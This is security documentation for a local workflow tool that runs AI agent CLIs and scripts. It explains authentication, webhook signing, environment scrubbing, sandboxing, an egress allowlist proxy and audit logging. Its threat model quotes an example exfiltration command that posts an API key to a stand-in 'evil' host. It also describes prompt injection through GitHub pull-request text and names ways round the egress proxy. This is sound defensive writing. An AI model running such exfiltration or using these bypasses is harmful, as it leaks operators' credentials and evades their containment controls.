Infinite Loop is a developer tool that runs on your machine and can execute:
- Local agent CLIs (
claude,codex, anything you register as a provider). - Inline TypeScript and Python (Script nodes).
- Shell commands (Condition nodes with
kind: command). - Workflows queued by inbound webhooks.
That power means it should be treated like a local code execution surface, not a typical web app.
Out of the box server.ts binds to 127.0.0.1 (loopback), so the console is reachable only from this machine. This is the fail-closed default: no token is needed because nothing off-host can connect.
To reach the console from other machines you must bind a network address (HOST=0.0.0.0 or a specific LAN IP). Because anyone who can reach the port can also run your workflows — including the shell-condition and script nodes — the server will refuse to start when bound to a network address with no INFLOOP_API_TOKEN. You then have two choices:
-
Recommended — require a token (see Authenticated mode below):
INFLOOP_API_TOKEN=$(openssl rand -hex 32) HOST=0.0.0.0 bun run start -
Acknowledge the risk and run unauthenticated on a trusted network:
INFLOOP_ALLOW_INSECURE=1 HOST=0.0.0.0 bun run start
This starts the server but prints a loud insecure-mode banner. Anyone on the network can execute arbitrary code on this machine — only do this on a network you fully trust.
Set INFLOOP_API_TOKEN to require authentication on every /api/* call
(webhook ingress is the one exception — see below):
INFLOOP_API_TOKEN=$(openssl rand -hex 32) bun run startIn this mode:
- The browser UI keeps working. Visiting the console redirects to a login
page; enter the token once and the server sets an
httpOnly,SameSite=Strictsession cookie, after which the console behaves normally. - MCP / API / scripted clients keep authenticating with
Authorization: Bearer <token>— unchanged. - The session cookie value is a SHA-256 hash of the token, not the token
itself: a leaked cookie cannot be replayed as the bearer credential and
never exposes the literal
INFLOOP_API_TOKEN. It is still a bearer credential for this server, though — a stolen cookie grants full access until the token is rotated, so treat it like a password. - The session is stateless (no server-side store): it survives a server
restart, and rotating
INFLOOP_API_TOKENinvalidates every issued cookie immediately. - The cookie is marked
Secureautomatically when a reverse proxy reports HTTPS viaX-Forwarded-Proto; over plain HTTP it is not, because aSecurecookie would never be stored. - The token is compared in constant time but is otherwise a plain shared secret — rotate it like a password.
This is a single-tenant model: one shared token, no per-user accounts.
The unguessable triggerId in a webhook URL is the base credential.
- Treat webhook URLs like passwords. Don't paste them in shared docs or screenshots.
- Rotate via the regenerate-id button in the Dispatch form.
INFLOOP_API_TOKENdoes not apply to webhook ingress — external services like GitHub can't carry custom auth headers.
When a webhook plugin declares a signing scheme (e.g. GitHub's HMAC-SHA256), a trigger built on it is signature-verified: Infinite Loop recomputes the HMAC over the raw request body with the trigger's shared secret and rejects a missing or mismatched signature with 401. Set the secret in the Dispatch form when you create the trigger. A trigger on a signing-capable plugin must either carry a secret or explicitly opt out with verifyOptional: true (accepts unsigned requests, logs a warning) — with neither set, the request is refused as misconfigured rather than silently trusted.
INFLOOP_API_TOKEN does not gate the two surfaces that most need it: webhook
ingress (external senders cannot carry a bearer header) and the browser login
form (it is what issues the credential). Both are rate-limited in-process as
a defense-in-depth control:
- Webhook ingress is limited per trigger (
INFLOOP_WEBHOOK_RATE_LIMIT, default 120/min), so a leaked trigger URL cannot be hammered without limit. The bucket is keyed on the triggerId alone, so a flood also throttles that trigger's legitimate traffic — the real remedy for a leaked URL is to rotate it. - Browser login is limited by a single global bucket
(
INFLOOP_LOGIN_RATE_LIMIT, default 20/min). Brute-forcing a 256-bit token is already infeasible; this caps the log, audit, and CPU churn a login flood can cause. A sustained flood can429the login form — the operator can still authenticate API/MCP calls withAuthorization: Bearer, which is not behind this limiter.
Over the limit the response is 429 with a Retry-After header. The limiter
is in-memory and per-process: it resets on restart and a port-fallback second
instance keeps its own. It is a backstop, not a substitute for the proxy
below.
Infinite Loop has no per-user auth — one shared token, no accounts. Webhook ingress and browser login are rate-limited (see above) and trust-relevant events are recorded in an audit log, but for a publicly reachable trigger surface you should still put Infinite Loop behind one of:
- A Cloudflare Tunnel with Access policies that gate inbound traffic.
- A Tailscale ACL-restricted host.
- A reverse proxy (Caddy / nginx) with HTTP auth and IP allow-lists.
Never punch a port mapping on your router straight to Infinite Loop.
A .workflow.json file can:
- Run arbitrary shell commands via a Condition.
- Execute arbitrary TypeScript or Python via a Script node.
- Invoke any provider you have registered.
Review every workflow you import or download before running it. Treat them like you'd treat a Bash script from the internet.
The same applies to providers/*.json, webhook-plugins/*.json, and triggers/*.json — they all influence what Infinite Loop will execute or accept.
Agent and Script nodes run untrusted code — AI-authored, and routinely
shaped by webhook payloads the server does not control (a GitHub
pull_request trigger feeds an attacker-supplied title, body, and diff
straight into an agent prompt). The settings below bound what that code can
reach. They limit blast radius; the network posture and INFLOOP_API_TOKEN
limit who can ask. Both matter.
Spawned children do not inherit the server's environment. Each is given an explicit allowlist:
- a small base set of non-secret, environment-shaping variables (
PATH,HOME, locale,TZ, TLS/proxy config, …); - the variables a provider manifest declares it needs in
envPassthrough(theclaudemanifest passesANTHROPIC_*andCLAUDE_*, for example); - anything the operator opts into via
INFLOOP_CHILD_ENV_PASSTHROUGH(comma-separated exact names orPREFIX_*wildcards) — the escape hatch for site-specific needs such as a BedrockAWS_*, anSSH_AUTH_SOCK, or a Python virtualenv.
The entire INFLOOP_ namespace is never passed to a child — most
importantly INFLOOP_API_TOKEN, the bearer token gating the whole API. A
prompt-injected agent can no longer echo $INFLOOP_API_TOKEN and exfiltrate
it.
This is a behavior change: a Script that relied on an inherited host variable
(a venv, a registry token) must now have it named in
INFLOOP_CHILD_ENV_PASSTHROUGH. A provider's child needs its credentials
named in the manifest envPassthrough.
The claude provider is no longer shipped with
--dangerously-skip-permissions baked into its manifest. By default an
agent runs the CLI with its normal permission posture; in non-interactive
mode that means it cannot perform tool calls that require approval (it logs a
[permissions] notice when this applies).
To grant full autonomous file / shell / network access, tick "Skip
permission prompts (dangerous)" on the Agent node — it maps to the
manifest's dangerousArgs, injected only for that node. Enable it only for
prompts you trust, and ideally only inside the sandboxed container below.
Existing saved workflows are affected: a Claude agent node that previously ran fully autonomous now runs with prompts enabled until you opt back in. This is deliberate — autonomy is now a visible choice, not a silent default.
docker-compose.yml runs the app with a read-only root filesystem, all
Linux capabilities dropped, no-new-privileges, a pids_limit, and
writable state confined to named volumes and a /tmp tmpfs. Treat the
container as the containment unit for the untrusted code a run executes, and
do not bind-mount host directories into it by default.
The container needs egress (provider APIs, webhook responses), so it cannot
run --network none. To bound an individual agent run's network, see the
per-run egress allowlist below.
An Agent node spawns a provider CLI that runs untrusted, prompt-shaped code
with a real API credential in its environment — the manifest's envPassthrough
(ANTHROPIC_*, OPENAI_*), which scrubbing cannot strip without breaking the
provider. The risk is exfiltration: a prompt-injected agent running
curl https://evil/ -d "$ANTHROPIC_API_KEY".
A CLI provider manifest can declare an egressAllowlist — the hostnames
its child legitimately needs, each an exact host or a leading-wildcard
(*.anthropic.com, matching any subdomain but not the apex). When the
operator sets INFLOOP_EGRESS_ENFORCE=1, the runner starts a per-run
filtering proxy bound to loopback, points the child's HTTP(S)_PROXY at it,
and the proxy permits CONNECT tunnels and plain-HTTP forwards only to
allowlisted hosts — everything else is refused with 403 and logged. The
proxy also resolves each host itself and refuses one that resolves to a
loopback, private, or link-local address (a DNS-rebinding / SSRF guard, so it
cannot be turned into a pivot to an internal service or a cloud metadata
endpoint) unless that exact IP is itself an allowlist entry. If the proxy
cannot start, the run fails closed rather than running unrestricted. The
shipped claude and codex manifests already declare allowlists for their
provider APIs.
This is opt-in and off by default: with INFLOOP_EGRESS_ENFORCE unset,
children spawn exactly as before. The exact endpoint set a CLI needs varies by
version, so enable enforcement deliberately and extend the allowlist for your
setup.
What it is and isn't — it catches every standard HTTP client that honours
HTTP(S)_PROXY (curl, wget, the provider CLIs, Python requests). It is
defense-in-depth, not a jail:
- Raw-socket code that ignores proxy env vars bypasses it.
- It does not stop exfiltration to an allowlisted host — an attacker can
encode the key into a request to
api.anthropic.comitself. It removes the arbitrary-endpoint channel and forces an attacker onto hosts you chose. - It assumes direct outbound; chaining to a mandatory upstream corporate proxy is not supported.
For a stronger boundary, also run Infinite Loop on a network it cannot abuse.
New Agent nodes default to "Run in isolated git worktree", so an agent
edits a fresh worktree off cwd rather than the working tree directly. This
is a correctness/isolation default, not a security boundary — the process
still shares the host's filesystem and network. Uncheck it for a cwd that
is not a git repository.
A workflow that loops without a real bound — an infinite: true Loop, or
nested loops that multiply — can keep invoking agents (and spending API
credits) until a human notices. Every run is therefore capped by a
run-level budget, independent of any per-loop maxIterations:
INFLOOP_MAX_RUN_NODE_EXECUTIONS(default10000) — the maximum number of node-execution steps in a single run. When exceeded, the run is aborted and settles as failed with a budget message.0disables the ceiling.INFLOOP_MAX_RUN_DURATION_MS(default86400000, 24h) — a wall-clock cap, checked at each node-step boundary. A run that exceeds it is stopped at its next step; a single long-running node is not interrupted mid-flight. The default is a generous backstop against a genuinely-stuck run, not a tight SLA — long autonomous runs are expected. A run that legitimately needs more than 24h must raise this or set it to0(disabled).INFLOOP_MAX_RUN_COST_USD(default0, disabled) — a cumulative cost ceiling in US dollars. When set, the run is aborted and settles as failed once the total cost reported by its agents exceeds the cap. It is opt-in because no single dollar figure is safe for every user; set it to your real per-run budget.
A per-run cost cap does not bound a webhook storm or a misconfigured trigger — each run can stay under its own cap while the fleet of them spends without limit. The process-wide cost budget closes that:
INFLOOP_MAX_TOTAL_COST_USD(default0, disabled) — a cumulative cost ceiling, in US dollars, across every run since the process started. Once cumulative provider-reported cost passes it, new runs are refused at admission (POST /api/runanswers503) and any in-flight run is aborted at its next costed node. Queued trigger runs are held, not dropped — the queue drain pauses, leaving them on disk to resume after a restart (which also resets the in-memory total); a queued run was already acknowledged to its caller, so it is not silently discarded. Like the per-run cap it is opt-in — set it to your real budget. It is process-lifetime and in-memory: a restart resets the total to zero. For a windowed (e.g. daily) view, alert on theinfloop_run_cost_usd_totalmetric instead — see configuration.md.
The node and wall-clock ceilings bound every run. The node ceiling is the
deterministic guard: an unbounded loop will always hit it. Raise the limit if
you have a legitimately large workflow — but treat a budget failure as a
prompt to add an explicit maxIterations cap, not just to raise the ceiling.
Cost-cap coverage. Both cost caps only count cost from providers that
report it — currently the claude CLI (via its total_cost_usd result
frame). HTTP providers report no cost, so a workflow built entirely on HTTP
providers is not bounded by either cost cap; the node and wall-clock
ceilings remain its backstop. The cost is also surfaced per agent node as the
costUsd output (usable in {{ ... }} templates).
The run-level budget only bounds spend while the server process is alive.
Provider CLIs are spawned in their own process group (detached: true) so a
per-run cancel can kill grandchildren — but the flip side is they do not
die with the server. A hard crash (OOM-kill, kill -9, power loss) skips the
graceful-shutdown handlers entirely, leaving every in-flight agent CLI running
as an orphan that keeps spending API credits, invisibly.
To close that gap, every detached child is recorded under <data-dir>/pids/
and every in-flight run leaves a marker under <data-dir>/active-runs/. On the
next start, before the HTTP server accepts traffic, Infinite Loop:
- kills any orphaned process groups left behind by the previous server, and
- records any run interrupted by the crash as failed in history, so it is not silently lost.
A normal Ctrl+C shutdown reaps children directly and leaves nothing to recover. Recovery is also instance-aware: when two servers run at once (port fallback), one never reaps the other's live children or runs.
Infinite Loop runs unattended — triggered by webhooks and MCP when nobody is watching the console. A proxy in front of the app can supply per-user identity and access logs, but it can never see what the app did: which workflow ran, which trigger was created or deleted, which login attempt failed, which webhook was accepted or rejected. Only the app knows that.
So every trust-relevant event is written to a durable, append-only audit log
at <data-dir>/audit/audit.jsonl — one JSON object per line, the moment it
happens. It covers:
- run lifecycle — a run starting and settling, including runs reconciled as failed after a crash;
- auth — login successes and failures, and logout;
- triggers — every create, update, and delete via the API;
- webhooks — each request to a real trigger that is accepted or rejected (bad signature, queue full, misconfigured, invalid inputs).
Unlike run history — capped per workflow and pruned — the audit log is bounded
only by a generous size-based rotation (INFLOOP_AUDIT_MAX_BYTES /
INFLOOP_AUDIT_MAX_FILES), so it retains months of events. Entries record a
coarse actor (api-token, browser-session, webhook, system, open) but
never a secret — no tokens, no trigger secrets, no request bodies. Read it
back through the authenticated GET /api/audit endpoint.
Each entry caused by an ingress event — a webhook, an API run, an MCP enqueue
— also carries a correlationId (cid_…). The same id is stamped on the
run's events and its history record, so one grep cid_… walks the whole
chain: webhook accept → queued run → run start → run finish. The ingress
response returns the id in its body and in an x-correlation-id header.
The log shares the data directory's trust boundary: it is not tamper-proofed, because a local attacker who can rewrite it can already rewrite everything else on the machine.
The data directory holds two kinds of secret:
- Webhook shared secrets — the HMAC
secreton a signature-verified trigger, stored intriggers/<id>.json. - Provider connection tokens — bearer tokens for registered connections,
stored in
connections/<id>.json.
Both are stored in plaintext. Encryption at rest would not add a real boundary here: this host already runs arbitrary code (agent and script nodes), so anything that can read the data directory can also read the key used to decrypt it. The honest control is the data directory's own trust boundary — the same one the audit log relies on.
As defense-in-depth against other local users on a shared host — and
against accidental exposure through a world-readable backup or a misconfigured
file sync — these files are written with 0600 permissions (owner read/write
only). The atomic tmp-write-then-rename used for both stores creates the temp
file 0600, so the published file is owner-only from the moment it appears.
One residual: a trigger file written by a build older than this behavior
keeps its original permissions until it is next written — re-saving the
trigger, or any real webhook fire (which updates lastFiredAt), rewrites it
0600. Keep the data directory itself owner-only, and never commit it to a
repo or sync it to a shared location.
Infinite Loop is pre-1.0 and currently has no formal disclosure channel. Open a GitHub issue for non-sensitive concerns; for anything that warrants private disclosure, contact the maintainer directly.